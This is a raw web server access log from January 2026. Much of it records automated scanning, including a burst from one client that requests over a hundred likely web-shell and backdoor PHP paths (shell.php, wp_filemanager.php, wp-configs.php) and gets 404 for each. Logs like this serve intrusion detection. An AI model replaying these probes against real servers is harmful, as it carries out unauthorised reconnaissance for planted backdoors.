Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[21/Jan/2026:20:14:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:15:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:19:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:24:25 +0000] 400 - GET http 91.82.83.208 "/" [Client 98.80.4.90] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3076.96 Safari/537.32" "-" +[21/Jan/2026:20:39:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:20:42:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:43:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:44:36 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:45:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/class.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/lm13.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/1aa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/mail.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/v3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/ilex.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/wto.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/777.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/file88.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/ffile.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/p.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/000.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/403.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/class20.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/lol.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/cc.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/o.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/aaa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/n.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/666.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/fileas.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/cccc.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/CLA.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/wfile.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/abc.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/wb.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/mds.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/mlex.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/a.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/a2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/inde.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/vee.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/wcas.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/k.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/finny.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws45.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/build.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws33.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/klex.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws34.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/alpa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/444.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/pp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws38.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/555.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/error.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/he.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/cfile.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/doti.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/sko.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/gmo.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws37.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/geck.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/nfile.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/file32.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/class9.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/031.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/file4.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/file5.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/tx38.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxxx.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/akk.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/aa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/x7.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws36.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/0x0x.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/xx.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/card.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/size.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:45:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/class629.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/file9.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/moon.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/file18.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/file21.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxw.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/racs3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/333.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/12.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/moon3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/tor.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/haa.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/f6.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/asas.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/x.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/ava.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/ton.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/v1.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/111.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/an7.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/xeqdlun.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/acp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/yellow.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/lala.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/file3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/file17.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/shell.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/file15.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/file30.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless5.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-is.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/hook.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/mini.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/class19.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/plss3.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/0x.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/file1.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/file8.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/100.kb.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/ppp.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/tox.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless11.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/030.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/v4.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxx.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/fs.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/33.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/v2.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/new4.php" [Client 4.241.184.25] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:20:46:15 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:20:48:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:08:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:09:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:17:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:19:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.102.138] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:21:21:40 +0000] 404 - GET http 91.82.83.208 "/_profiler/phpinfo" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Mobile Safari/537.36" "-" +[21/Jan/2026:21:30:15 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:33:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:39:49 +0000] 400 - GET http 91.82.83.208 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:21:45:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:55:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:21:59:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:08:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:14:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:18:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.242.226.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[21/Jan/2026:22:20:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 71.6.146.186] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[21/Jan/2026:22:20:46 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 71.6.146.186] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:22:20:47 +0000] 404 - GET http 91.82.83.208 "/sitemap.xml" [Client 71.6.146.186] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:22:20:48 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 71.6.146.186] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:22:20:52 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:22:23:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:22:25:05 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[21/Jan/2026:22:25:06 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 46.161.50.108] [Length 654] [Gzip -] 